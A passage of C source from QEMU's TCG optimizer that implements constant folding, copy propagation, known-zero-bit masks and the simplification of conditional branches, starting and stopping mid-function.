    op->args[1] = val;

    reset_temp(dst);
    di->is_const = true;
    di->val = val;
    mask = val;
    if (TCG_TARGET_REG_BITS > 32 && new_op == INDEX_op_movi_i32) {
        /* High bits of the destination are now garbage.
*/ mask |= ~0xffffffffull; } di->mask = mask; } static void tcg_opt_gen_mov(TCGContext *s, TCGOp *op, TCGArg dst, TCGArg src) { TCGTemp *dst_ts = arg_temp(dst); TCGTemp *src_ts = arg_temp(src); const TCGOpDef *def; struct tcg_temp_info *di; struct tcg_temp_info *si; tcg_target_ulong mask; TCGOpcode new_op; if (ts_are_copies(dst_ts, src_ts)) { tcg_op_remove(s, op); return; } reset_ts(dst_ts); di = ts_info(dst_ts); si = ts_info(src_ts); def = &s->tcg_op_defs[op->opc]; if (def->flags & TCG_OPF_VECTOR) { new_op = INDEX_op_mov_vec; } else if (def->flags & TCG_OPF_64BIT) { new_op = INDEX_op_mov_i64; } else { new_op = INDEX_op_mov_i32; } op->opc = new_op; /* TCGOP_VECL and TCGOP_VECE remain unchanged. */ op->args[0] = dst; op->args[1] = src; mask = si->mask; if (TCG_TARGET_REG_BITS > 32 && new_op == INDEX_op_mov_i32) { /* High bits of the destination are now garbage. */ mask |= ~0xffffffffull; } di->mask = mask; if (src_ts->type == dst_ts->type) { struct tcg_temp_info *ni = ts_info(si->next_copy); di->next_copy = si->next_copy; di->prev_copy = src_ts; ni->prev_copy = dst_ts; si->next_copy = dst_ts; di->is_const = si->is_const; di->val = si->val; } } static TCGArg do_constant_folding_2(TCGOpcode op, TCGArg x, TCGArg y) { uint64_t l64, h64; switch (op) { CASE_OP_32_64(add): return x + y; CASE_OP_32_64(sub): return x - y; CASE_OP_32_64(mul): return x * y; CASE_OP_32_64(and): return x & y; CASE_OP_32_64(or): return x | y; CASE_OP_32_64(xor): return x ^ y; case INDEX_op_shl_i32: return (uint32_t)x << (y & 31); case INDEX_op_shl_i64: return (uint64_t)x << (y & 63); case INDEX_op_shr_i32: return (uint32_t)x >> (y & 31); case INDEX_op_shr_i64: return (uint64_t)x >> (y & 63); case INDEX_op_sar_i32: return (int32_t)x >> (y & 31); case INDEX_op_sar_i64: return (int64_t)x >> (y & 63); case INDEX_op_rotr_i32: return ror32(x, y & 31); case INDEX_op_rotr_i64: return ror64(x, y & 63); case INDEX_op_rotl_i32: return rol32(x, y & 31); case INDEX_op_rotl_i64: return rol64(x, y & 63); CASE_OP_32_64(not): return ~x; CASE_OP_32_64(neg): #ifdef _MSC_VER return (0 - x); #else return -x; #endif CASE_OP_32_64(andc): return x & ~y; CASE_OP_32_64(orc): return x | ~y; CASE_OP_32_64(eqv): return ~(x ^ y); CASE_OP_32_64(nand): return ~(x & y); CASE_OP_32_64(nor): return ~(x | y); case INDEX_op_clz_i32: return (uint32_t)x ? clz32(x) : y; case INDEX_op_clz_i64: return x ? clz64(x) : y; case INDEX_op_ctz_i32: return (uint32_t)x ? ctz32(x) : y; case INDEX_op_ctz_i64: return x ? ctz64(x) : y; case INDEX_op_ctpop_i32: return ctpop32(x); case INDEX_op_ctpop_i64: return ctpop64(x); CASE_OP_32_64(ext8s): return (int8_t)x; CASE_OP_32_64(ext16s): return (int16_t)x; CASE_OP_32_64(ext8u): return (uint8_t)x; CASE_OP_32_64(ext16u): return (uint16_t)x; CASE_OP_32_64(bswap16): return bswap16(x); CASE_OP_32_64(bswap32): return bswap32(x); case INDEX_op_bswap64_i64: return bswap64(x); case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: return (int32_t)x; case INDEX_op_extu_i32_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_ext32u_i64: return (uint32_t)x; case INDEX_op_extrh_i64_i32: return (uint64_t)x >> 32; case INDEX_op_muluh_i32: return ((uint64_t)(uint32_t)x * (uint32_t)y) >> 32; case INDEX_op_mulsh_i32: return ((int64_t)(int32_t)x * (int32_t)y) >> 32; case INDEX_op_muluh_i64: mulu64(&l64, &h64, x, y); return h64; case INDEX_op_mulsh_i64: muls64(&l64, &h64, x, y); return h64; case INDEX_op_div_i32: /* Avoid crashing on divide by zero, otherwise undefined. */ return (int32_t)x / ((int32_t)y ? 
(int32_t)y : 1); case INDEX_op_divu_i32: return (uint32_t)x / ((uint32_t)y ? (uint32_t)y : 1); case INDEX_op_div_i64: return (int64_t)x / ((int64_t)y ? (int64_t)y : 1); case INDEX_op_divu_i64: return (uint64_t)x / ((uint64_t)y ? (uint64_t)y : 1); case INDEX_op_rem_i32: return (int32_t)x % ((int32_t)y ? (int32_t)y : 1); case INDEX_op_remu_i32: return (uint32_t)x % ((uint32_t)y ? (uint32_t)y : 1); case INDEX_op_rem_i64: return (int64_t)x % ((int64_t)y ? (int64_t)y : 1); case INDEX_op_remu_i64: return (uint64_t)x % ((uint64_t)y ? (uint64_t)y : 1); default: fprintf(stderr, "Unrecognized operation %d in do_constant_folding.\n", op); tcg_abort(); } } static TCGArg do_constant_folding(TCGContext *s, TCGOpcode op, TCGArg x, TCGArg y) { const TCGOpDef *def = &s->tcg_op_defs[op]; TCGArg res = do_constant_folding_2(op, x, y); if (!(def->flags & TCG_OPF_64BIT)) { res = (int32_t)res; } return res; } static bool do_constant_folding_cond_32(uint32_t x, uint32_t y, TCGCond c) { switch (c) { case TCG_COND_EQ: return x == y; case TCG_COND_NE: return x != y; case TCG_COND_LT: return (int32_t)x < (int32_t)y; case TCG_COND_GE: return (int32_t)x >= (int32_t)y; case TCG_COND_LE: return (int32_t)x <= (int32_t)y; case TCG_COND_GT: return (int32_t)x > (int32_t)y; case TCG_COND_LTU: return x < y; case TCG_COND_GEU: return x >= y; case TCG_COND_LEU: return x <= y; case TCG_COND_GTU: return x > y; default: tcg_abort(); } } static bool do_constant_folding_cond_64(uint64_t x, uint64_t y, TCGCond c) { switch (c) { case TCG_COND_EQ: return x == y; case TCG_COND_NE: return x != y; case TCG_COND_LT: return (int64_t)x < (int64_t)y; case TCG_COND_GE: return (int64_t)x >= (int64_t)y; case TCG_COND_LE: return (int64_t)x <= (int64_t)y; case TCG_COND_GT: return (int64_t)x > (int64_t)y; case TCG_COND_LTU: return x < y; case TCG_COND_GEU: return x >= y; case TCG_COND_LEU: return x <= y; case TCG_COND_GTU: return x > y; default: tcg_abort(); } } static bool do_constant_folding_cond_eq(TCGCond c) { switch (c) { case TCG_COND_GT: case TCG_COND_LTU: case TCG_COND_LT: case TCG_COND_GTU: case TCG_COND_NE: return 0; case TCG_COND_GE: case TCG_COND_GEU: case TCG_COND_LE: case TCG_COND_LEU: case TCG_COND_EQ: return 1; default: tcg_abort(); } } /* Return 2 if the condition can't be simplified, and the result of the condition (0 or 1) if it can */ static TCGArg do_constant_folding_cond(TCGContext *s, TCGOpcode op, TCGArg x, TCGArg y, TCGCond c) { tcg_target_ulong xv = arg_info(x)->val; tcg_target_ulong yv = arg_info(y)->val; if (arg_is_const(x) && arg_is_const(y)) { const TCGOpDef *def = &s->tcg_op_defs[op]; tcg_debug_assert(!(def->flags & TCG_OPF_VECTOR)); if (def->flags & TCG_OPF_64BIT) { return do_constant_folding_cond_64(xv, yv, c); } else { return do_constant_folding_cond_32(xv, yv, c); } } else if (args_are_copies(x, y)) { return do_constant_folding_cond_eq(c); } else if (arg_is_const(y) && yv == 0) { switch (c) { case TCG_COND_LTU: return 0; case TCG_COND_GEU: return 1; default: return 2; } } return 2; } /* Return 2 if the condition can't be simplified, and the result of the condition (0 or 1) if it can */ static TCGArg do_constant_folding_cond2(TCGArg *p1, TCGArg *p2, TCGCond c) { TCGArg al = p1[0], ah = p1[1]; TCGArg bl = p2[0], bh = p2[1]; if (arg_is_const(bl) && arg_is_const(bh)) { tcg_target_ulong blv = arg_info(bl)->val; tcg_target_ulong bhv = arg_info(bh)->val; uint64_t b = deposit64(blv, 32, 32, bhv); if (arg_is_const(al) && arg_is_const(ah)) { tcg_target_ulong alv = arg_info(al)->val; tcg_target_ulong ahv = arg_info(ah)->val; 
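            /*
             * Both 32-bit halves are known constants here, so fuse them into
             * a single 64-bit value and reuse the 64-bit comparator above.
             * deposit64 places AHV into bits [32,63] of ALV: for example,
             * alv = 0x1 and ahv = 0x2 yield a = 0x0000000200000001.
             */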
uint64_t a = deposit64(alv, 32, 32, ahv); return do_constant_folding_cond_64(a, b, c); } if (b == 0) { switch (c) { case TCG_COND_LTU: return 0; case TCG_COND_GEU: return 1; default: break; } } } if (args_are_copies(al, bl) && args_are_copies(ah, bh)) { return do_constant_folding_cond_eq(c); } return 2; } static bool swap_commutative(TCGArg dest, TCGArg *p1, TCGArg *p2) { TCGArg a1 = *p1, a2 = *p2; int sum = 0; sum += arg_is_const(a1); sum -= arg_is_const(a2); /* Prefer the constant in second argument, and then the form op a, a, b, which is better handled on non-RISC hosts. */ if (sum > 0 || (sum == 0 && dest == a2)) { *p1 = a2; *p2 = a1; return true; } return false; } static bool swap_commutative2(TCGArg *p1, TCGArg *p2) { int sum = 0; sum += arg_is_const(p1[0]); sum += arg_is_const(p1[1]); sum -= arg_is_const(p2[0]); sum -= arg_is_const(p2[1]); if (sum > 0) { TCGArg t; t = p1[0], p1[0] = p2[0], p2[0] = t; t = p1[1], p1[1] = p2[1], p2[1] = t; return true; } return false; } /* Propagate constants and copies, fold constant expressions. */ void tcg_optimize(TCGContext *s) { int nb_temps, nb_globals; TCGOp *op, *op_next, *prev_mb = NULL; struct tcg_temp_info *infos; TCGTempSet temps_used; /* Array VALS has an element for each temp. If this temp holds a constant then its value is kept in VALS' element. If this temp is a copy of other ones then the other copies are available through the doubly linked circular list. */ nb_temps = s->nb_temps; nb_globals = s->nb_globals; bitmap_zero(temps_used.l, nb_temps); infos = tcg_malloc(s, sizeof(struct tcg_temp_info) * nb_temps); QTAILQ_FOREACH_SAFE(op, &s->ops, link, op_next) { tcg_target_ulong mask, partmask, affected; int nb_oargs, nb_iargs, i; TCGArg tmp; TCGOpcode opc = op->opc; const TCGOpDef *def = &s->tcg_op_defs[opc]; /* Count the arguments, and initialize the temps that are going to be used */ if (opc == INDEX_op_call) { nb_oargs = TCGOP_CALLO(op); nb_iargs = TCGOP_CALLI(op); for (i = 0; i < nb_oargs + nb_iargs; i++) { TCGTemp *ts = arg_temp(op->args[i]); if (ts) { init_ts_info(s, infos, &temps_used, ts); } } } else { nb_oargs = def->nb_oargs; nb_iargs = def->nb_iargs; for (i = 0; i < nb_oargs + nb_iargs; i++) { init_arg_info(s, infos, &temps_used, op->args[i]); } } /* Do copy propagation */ for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { TCGTemp *ts = arg_temp(op->args[i]); if (ts && ts_is_copy(ts)) { op->args[i] = temp_arg(find_better_copy(s, ts)); } } /* For commutative operations make constant second argument */ switch (opc) { CASE_OP_32_64_VEC(add): CASE_OP_32_64_VEC(mul): CASE_OP_32_64_VEC(and): CASE_OP_32_64_VEC(or): CASE_OP_32_64_VEC(xor): CASE_OP_32_64(eqv): CASE_OP_32_64(nand): CASE_OP_32_64(nor): CASE_OP_32_64(muluh): CASE_OP_32_64(mulsh): swap_commutative(op->args[0], &op->args[1], &op->args[2]); break; CASE_OP_32_64(brcond): if (swap_commutative(-1, &op->args[0], &op->args[1])) { op->args[2] = tcg_swap_cond(op->args[2]); } break; CASE_OP_32_64(setcond): if (swap_commutative(op->args[0], &op->args[1], &op->args[2])) { op->args[3] = tcg_swap_cond(op->args[3]); } break; CASE_OP_32_64(movcond): if (swap_commutative(-1, &op->args[1], &op->args[2])) { op->args[5] = tcg_swap_cond(op->args[5]); } /* For movcond, we canonicalize the "false" input reg to match the destination reg so that the tcg backend can implement a "move if true" operation. 
*/ if (swap_commutative(op->args[0], &op->args[4], &op->args[3])) { op->args[5] = tcg_invert_cond(op->args[5]); } break; CASE_OP_32_64(add2): swap_commutative(op->args[0], &op->args[2], &op->args[4]); swap_commutative(op->args[1], &op->args[3], &op->args[5]); break; CASE_OP_32_64(mulu2): CASE_OP_32_64(muls2): swap_commutative(op->args[0], &op->args[2], &op->args[3]); break; case INDEX_op_brcond2_i32: if (swap_commutative2(&op->args[0], &op->args[2])) { op->args[4] = tcg_swap_cond(op->args[4]); } break; case INDEX_op_setcond2_i32: if (swap_commutative2(&op->args[1], &op->args[3])) { op->args[5] = tcg_swap_cond(op->args[5]); } break; default: break; } /* Simplify expressions for "shift/rot r, 0, a => movi r, 0", and "sub r, 0, a => neg r, a" case. */ switch (opc) { CASE_OP_32_64(shl): CASE_OP_32_64(shr): CASE_OP_32_64(sar): CASE_OP_32_64(rotl): CASE_OP_32_64(rotr): if (arg_is_const(op->args[1]) && arg_info(op->args[1])->val == 0) { tcg_opt_gen_movi(s, op, op->args[0], 0); continue; } break; CASE_OP_32_64_VEC(sub): { TCGOpcode neg_op; bool have_neg; if (arg_is_const(op->args[2])) { /* Proceed with possible constant folding. */ break; } if (opc == INDEX_op_sub_i32) { neg_op = INDEX_op_neg_i32; have_neg = TCG_TARGET_HAS_neg_i32; } else if (opc == INDEX_op_sub_i64) { neg_op = INDEX_op_neg_i64; have_neg = TCG_TARGET_HAS_neg_i64; } else if (TCG_TARGET_HAS_neg_vec) { TCGType type = TCGOP_VECL(op) + TCG_TYPE_V64; unsigned vece = TCGOP_VECE(op); neg_op = INDEX_op_neg_vec; have_neg = tcg_can_emit_vec_op(s, neg_op, type, vece) > 0; } else { break; } if (!have_neg) { break; } if (arg_is_const(op->args[1]) && arg_info(op->args[1])->val == 0) { op->opc = neg_op; reset_temp(op->args[0]); op->args[1] = op->args[2]; continue; } } break; CASE_OP_32_64_VEC(xor): CASE_OP_32_64(nand): if (!arg_is_const(op->args[1]) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == -1) { i = 1; goto try_not; } break; CASE_OP_32_64(nor): if (!arg_is_const(op->args[1]) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == 0) { i = 1; goto try_not; } break; CASE_OP_32_64_VEC(andc): if (!arg_is_const(op->args[2]) && arg_is_const(op->args[1]) && arg_info(op->args[1])->val == -1) { i = 2; goto try_not; } break; CASE_OP_32_64_VEC(orc): CASE_OP_32_64(eqv): if (!arg_is_const(op->args[2]) && arg_is_const(op->args[1]) && arg_info(op->args[1])->val == 0) { i = 2; goto try_not; } break; try_not: { TCGOpcode not_op; bool have_not; if (def->flags & TCG_OPF_VECTOR) { not_op = INDEX_op_not_vec; have_not = TCG_TARGET_HAS_not_vec; } else if (def->flags & TCG_OPF_64BIT) { not_op = INDEX_op_not_i64; have_not = TCG_TARGET_HAS_not_i64; } else { not_op = INDEX_op_not_i32; have_not = TCG_TARGET_HAS_not_i32; } if (!have_not) { break; } op->opc = not_op; reset_temp(op->args[0]); op->args[1] = op->args[i]; continue; } default: break; } /* Simplify expression for "op r, a, const => mov r, a" cases */ switch (opc) { CASE_OP_32_64_VEC(add): CASE_OP_32_64_VEC(sub): CASE_OP_32_64_VEC(or): CASE_OP_32_64_VEC(xor): CASE_OP_32_64_VEC(andc): CASE_OP_32_64(shl): CASE_OP_32_64(shr): CASE_OP_32_64(sar): CASE_OP_32_64(rotl): CASE_OP_32_64(rotr): if (!arg_is_const(op->args[1]) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == 0) { tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); continue; } break; CASE_OP_32_64_VEC(and): CASE_OP_32_64_VEC(orc): CASE_OP_32_64(eqv): if (!arg_is_const(op->args[1]) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == -1) { tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); continue; } break; default: 
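            /* No identity with a constant operand applies to the remaining
               opcodes; keep the op and let the known-zero-bits analysis
               below have a look at it. */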
break; } /* Simplify using known-zero bits. Currently only ops with a single output argument is supported. */ mask = -1; affected = -1; switch (opc) { CASE_OP_32_64(ext8s): if ((arg_info(op->args[1])->mask & 0x80) != 0) { break; } CASE_OP_32_64(ext8u): mask = 0xff; goto and_const; CASE_OP_32_64(ext16s): if ((arg_info(op->args[1])->mask & 0x8000) != 0) { break; } CASE_OP_32_64(ext16u): mask = 0xffff; goto and_const; case INDEX_op_ext32s_i64: if ((arg_info(op->args[1])->mask & 0x80000000) != 0) { break; } case INDEX_op_ext32u_i64: mask = 0xffffffffU; goto and_const; CASE_OP_32_64(and): mask = arg_info(op->args[2])->mask; if (arg_is_const(op->args[2])) { and_const: affected = arg_info(op->args[1])->mask & ~mask; } mask = arg_info(op->args[1])->mask & mask; break; case INDEX_op_ext_i32_i64: if ((arg_info(op->args[1])->mask & 0x80000000) != 0) { break; } case INDEX_op_extu_i32_i64: /* We do not compute affected as it is a size changing op. */ mask = (uint32_t)arg_info(op->args[1])->mask; break; CASE_OP_32_64(andc): /* Known-zeros does not imply known-ones. Therefore unless op->args[2] is constant, we can't infer anything from it. */ if (arg_is_const(op->args[2])) { mask = ~arg_info(op->args[2])->mask; goto and_const; } /* But we certainly know nothing outside args[1] may be set. */ mask = arg_info(op->args[1])->mask; break; case INDEX_op_sar_i32: if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & 31; mask = (int32_t)arg_info(op->args[1])->mask >> tmp; } break; case INDEX_op_sar_i64: if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & 63; mask = (int64_t)arg_info(op->args[1])->mask >> tmp; } break; case INDEX_op_shr_i32: if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & 31; mask = (uint32_t)arg_info(op->args[1])->mask >> tmp; } break; case INDEX_op_shr_i64: if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & 63; mask = (uint64_t)arg_info(op->args[1])->mask >> tmp; } break; case INDEX_op_extrl_i64_i32: mask = (uint32_t)arg_info(op->args[1])->mask; break; case INDEX_op_extrh_i64_i32: mask = (uint64_t)arg_info(op->args[1])->mask >> 32; break; CASE_OP_32_64(shl): if (arg_is_const(op->args[2])) { tmp = arg_info(op->args[2])->val & (TCG_TARGET_REG_BITS - 1); mask = arg_info(op->args[1])->mask << tmp; } break; CASE_OP_32_64(neg): /* Set to 1 all bits to the left of the rightmost. 
*/ #ifdef _MSC_VER mask = 0 - (arg_info(op->args[1])->mask & (0 - arg_info(op->args[1])->mask)); #else mask = -(arg_info(op->args[1])->mask & -arg_info(op->args[1])->mask); #endif break; CASE_OP_32_64(deposit): mask = deposit64(arg_info(op->args[1])->mask, op->args[3], op->args[4], arg_info(op->args[2])->mask); break; CASE_OP_32_64(extract): mask = extract64(arg_info(op->args[1])->mask, op->args[2], op->args[3]); if (op->args[2] == 0) { affected = arg_info(op->args[1])->mask & ~mask; } break; CASE_OP_32_64(sextract): mask = sextract64(arg_info(op->args[1])->mask, op->args[2], op->args[3]); if (op->args[2] == 0 && (tcg_target_long)mask >= 0) { affected = arg_info(op->args[1])->mask & ~mask; } break; CASE_OP_32_64(or): CASE_OP_32_64(xor): mask = arg_info(op->args[1])->mask | arg_info(op->args[2])->mask; break; case INDEX_op_clz_i32: case INDEX_op_ctz_i32: mask = arg_info(op->args[2])->mask | 31; break; case INDEX_op_clz_i64: case INDEX_op_ctz_i64: mask = arg_info(op->args[2])->mask | 63; break; case INDEX_op_ctpop_i32: mask = 32 | 31; break; case INDEX_op_ctpop_i64: mask = 64 | 63; break; CASE_OP_32_64(setcond): case INDEX_op_setcond2_i32: mask = 1; break; CASE_OP_32_64(movcond): mask = arg_info(op->args[3])->mask | arg_info(op->args[4])->mask; break; CASE_OP_32_64(ld8u): mask = 0xff; break; CASE_OP_32_64(ld16u): mask = 0xffff; break; case INDEX_op_ld32u_i64: mask = 0xffffffffu; break; CASE_OP_32_64(qemu_ld): { TCGMemOpIdx oi = op->args[nb_oargs + nb_iargs]; MemOp mop = get_memop(oi); if (!(mop & MO_SIGN)) { mask = (2ULL << ((8 << (mop & MO_SIZE)) - 1)) - 1; } } break; default: break; } /* 32-bit ops generate 32-bit results. For the result is zero test below, we can ignore high bits, but for further optimizations we need to record that the high bits contain garbage. */ partmask = mask; if (!(def->flags & TCG_OPF_64BIT)) { mask |= ~(tcg_target_ulong)0xffffffffu; partmask &= 0xffffffffu; affected &= 0xffffffffu; } if (partmask == 0) { tcg_debug_assert(nb_oargs == 1); tcg_opt_gen_movi(s, op, op->args[0], 0); continue; } if (affected == 0) { tcg_debug_assert(nb_oargs == 1); tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); continue; } /* Simplify expression for "op r, a, 0 => movi r, 0" cases */ switch (opc) { CASE_OP_32_64_VEC(and): CASE_OP_32_64_VEC(mul): CASE_OP_32_64(muluh): CASE_OP_32_64(mulsh): if (arg_is_const(op->args[2]) && arg_info(op->args[2])->val == 0) { tcg_opt_gen_movi(s, op, op->args[0], 0); continue; } break; default: break; } /* Simplify expression for "op r, a, a => mov r, a" cases */ switch (opc) { CASE_OP_32_64_VEC(or): CASE_OP_32_64_VEC(and): if (args_are_copies(op->args[1], op->args[2])) { tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); continue; } break; default: break; } /* Simplify expression for "op r, a, a => movi r, 0" cases */ switch (opc) { CASE_OP_32_64_VEC(andc): CASE_OP_32_64_VEC(sub): CASE_OP_32_64_VEC(xor): if (args_are_copies(op->args[1], op->args[2])) { tcg_opt_gen_movi(s, op, op->args[0], 0); continue; } break; default: break; } /* Propagate constants through copy operations and do constant folding. Constants will be substituted to arguments by register allocator where needed and possible. Also detect copies. 
*/ switch (opc) { CASE_OP_32_64_VEC(mov): tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); break; CASE_OP_32_64(movi): case INDEX_op_dupi_vec: tcg_opt_gen_movi(s, op, op->args[0], op->args[1]); break; case INDEX_op_dup_vec: if (arg_is_const(op->args[1])) { tmp = arg_info(op->args[1])->val; tmp = dup_const(TCGOP_VECE(op), tmp); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(not): CASE_OP_32_64(neg): CASE_OP_32_64(ext8s): CASE_OP_32_64(ext8u): CASE_OP_32_64(ext16s): CASE_OP_32_64(ext16u): CASE_OP_32_64(ctpop): CASE_OP_32_64(bswap16): CASE_OP_32_64(bswap32): case INDEX_op_bswap64_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_extrh_i64_i32: if (arg_is_const(op->args[1])) { tmp = do_constant_folding(s, opc, arg_info(op->args[1])->val, 0); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(add): CASE_OP_32_64(sub): CASE_OP_32_64(mul): CASE_OP_32_64(or): CASE_OP_32_64(and): CASE_OP_32_64(xor): CASE_OP_32_64(shl): CASE_OP_32_64(shr): CASE_OP_32_64(sar): CASE_OP_32_64(rotl): CASE_OP_32_64(rotr): CASE_OP_32_64(andc): CASE_OP_32_64(orc): CASE_OP_32_64(eqv): CASE_OP_32_64(nand): CASE_OP_32_64(nor): CASE_OP_32_64(muluh): CASE_OP_32_64(mulsh): CASE_OP_32_64(div): CASE_OP_32_64(divu): CASE_OP_32_64(rem): CASE_OP_32_64(remu): if (arg_is_const(op->args[1]) && arg_is_const(op->args[2])) { tmp = do_constant_folding(s, opc, arg_info(op->args[1])->val, arg_info(op->args[2])->val); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(clz): CASE_OP_32_64(ctz): if (arg_is_const(op->args[1])) { TCGArg v = arg_info(op->args[1])->val; if (v != 0) { tmp = do_constant_folding(s, opc, v, 0); tcg_opt_gen_movi(s, op, op->args[0], tmp); } else { tcg_opt_gen_mov(s, op, op->args[0], op->args[2]); } break; } goto do_default; CASE_OP_32_64(deposit): if (arg_is_const(op->args[1]) && arg_is_const(op->args[2])) { tmp = deposit64(arg_info(op->args[1])->val, op->args[3], op->args[4], arg_info(op->args[2])->val); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(extract): if (arg_is_const(op->args[1])) { tmp = extract64(arg_info(op->args[1])->val, op->args[2], op->args[3]); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(sextract): if (arg_is_const(op->args[1])) { tmp = sextract64(arg_info(op->args[1])->val, op->args[2], op->args[3]); tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(extract2): if (arg_is_const(op->args[1]) && arg_is_const(op->args[2])) { TCGArg v1 = arg_info(op->args[1])->val; TCGArg v2 = arg_info(op->args[2])->val; if (opc == INDEX_op_extract2_i64) { tmp = (v1 >> op->args[3]) | (v2 << (64 - op->args[3])); } else { tmp = (int32_t)(((uint32_t)v1 >> op->args[3]) | ((uint32_t)v2 << (32 - op->args[3]))); } tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(setcond): tmp = do_constant_folding_cond(s, opc, op->args[1], op->args[2], op->args[3]); if (tmp != 2) { tcg_opt_gen_movi(s, op, op->args[0], tmp); break; } goto do_default; CASE_OP_32_64(brcond): tmp = do_constant_folding_cond(s, opc, op->args[0], op->args[1], op->args[2]); if (tmp != 2) { if (tmp) { bitmap_zero(temps_used.l, nb_temps); op->opc = INDEX_op_br; op->args[0] = op->args[3]; } else { tcg_op_remove(s, op); } break; } goto do_default; CASE_OP_32_64(movcond): tmp = do_constant_folding_cond(s, opc, op->args[1], op->args[2], 
op->args[5]); if (tmp != 2) { tcg_opt_gen_mov(s, op, op->args[0], op->args[4-tmp]); break; } if (arg_is_const(op->args[3]) && arg_is_const(op->args[4])) { tcg_target_ulong tv = arg_info(op->args[3])->val; tcg_target_ulong fv = arg_info(op->args[4])->val; TCGCond cond = op->args[5]; if (fv == 1 && tv == 0) { cond = tcg_invert_cond(cond); } else if (!(tv == 1 && fv == 0)) { goto do_default; } op->args[3] = cond; op->opc = opc = (opc == INDEX_op_movcond_i32 ? INDEX_op_setcond_i32 : INDEX_op_setcond_i64); nb_iargs = 2; } goto do_default; case INDEX_op_add2_i32: case INDEX_op_sub2_i32: if (arg_is_const(op->args[2]) && arg_is_const(op->args[3]) && arg_is_const(op->args[4]) && arg_is_const(op->args[5])) { uint32_t al = arg_info(op->args[2])->val; uint32_t ah = arg_info(op->args[3])->val; uint32_t bl = arg_info(op->args[4])->val; uint32_t bh = arg_info(op->args[5])->val; uint64_t a = ((uint64_t)ah << 32) | al; uint64_t b = ((uint64_t)bh << 32) | bl; TCGArg rl, rh; TCGOp *op2 = tcg_op_insert_before(s, op, INDEX_op_movi_i32); if (opc == INDEX_op_add2_i32) { a += b; } else { a -= b; } rl = op->args[0]; rh = op->args[1]; tcg_opt_gen_movi(s, op, rl, (int32_t)a); tcg_opt_gen_movi(s, op2, rh, (int32_t)(a >> 32)); break; } goto do_default; case INDEX_op_mulu2_i32: if (arg_is_const(op->args[2]) && arg_is_const(op->args[3])) { uint32_t a = arg_info(op->args[2])->val; uint32_t b = arg_info(op->args[3])->val; uint64_t r = (uint64_t)a * b; TCGArg rl, rh; TCGOp *op2 = tcg_op_insert_before(s, op, INDEX_op_movi_i32); rl = op->args[0]; rh = op->args[1]; tcg_opt_gen_movi(s, op, rl, (int32_t)r); tcg_opt_gen_movi(s, op2, rh, (int32_t)(r >> 32)); break; } goto do_default; case INDEX_op_brcond2_i32: tmp = do_constant_folding_cond2(&op->args[0], &op->args[2], op->args[4]); if (tmp != 2) { if (tmp) { do_brcond_true: bitmap_zero(temps_used.l, nb_temps); op->opc = INDEX_op_br; op->args[0] = op->args[5]; } else { do_brcond_false: tcg_op_remove(s, op); } } else if ((op->args[4] == TCG_COND_LT || op->args[4] == TCG_COND_GE) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == 0 && arg_is_const(op->args[3]) && arg_info(op->args[3])->val == 0) { /* Simplify LT/GE comparisons vs zero to a single compare vs the high word of the input. */ do_brcond_high: bitmap_zero(temps_used.l, nb_temps); op->opc = INDEX_op_brcond_i32; op->args[0] = op->args[1]; op->args[1] = op->args[3]; op->args[2] = op->args[4]; op->args[3] = op->args[5]; } else if (op->args[4] == TCG_COND_EQ) { /* Simplify EQ comparisons where one of the pairs can be simplified. */ tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, op->args[0], op->args[2], TCG_COND_EQ); if (tmp == 0) { goto do_brcond_false; } else if (tmp == 1) { goto do_brcond_high; } tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, op->args[1], op->args[3], TCG_COND_EQ); if (tmp == 0) { goto do_brcond_false; } else if (tmp != 1) { goto do_default; } do_brcond_low: bitmap_zero(temps_used.l, nb_temps); op->opc = INDEX_op_brcond_i32; op->args[1] = op->args[2]; op->args[2] = op->args[4]; op->args[3] = op->args[5]; } else if (op->args[4] == TCG_COND_NE) { /* Simplify NE comparisons where one of the pairs can be simplified. 
*/ tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, op->args[0], op->args[2], TCG_COND_NE); if (tmp == 0) { goto do_brcond_high; } else if (tmp == 1) { goto do_brcond_true; } tmp = do_constant_folding_cond(s, INDEX_op_brcond_i32, op->args[1], op->args[3], TCG_COND_NE); if (tmp == 0) { goto do_brcond_low; } else if (tmp == 1) { goto do_brcond_true; } goto do_default; } else { goto do_default; } break; case INDEX_op_setcond2_i32: tmp = do_constant_folding_cond2(&op->args[1], &op->args[3], op->args[5]); if (tmp != 2) { do_setcond_const: tcg_opt_gen_movi(s, op, op->args[0], tmp); } else if ((op->args[5] == TCG_COND_LT || op->args[5] == TCG_COND_GE) && arg_is_const(op->args[3]) && arg_info(op->args[3])->val == 0 && arg_is_const(op->args[4]) && arg_info(op->args[4])->val == 0) { /* Simplify LT/GE comparisons vs zero to a single compare vs the high word of the input. */ do_setcond_high: reset_temp(op->args[0]); arg_info(op->args[0])->mask = 1; 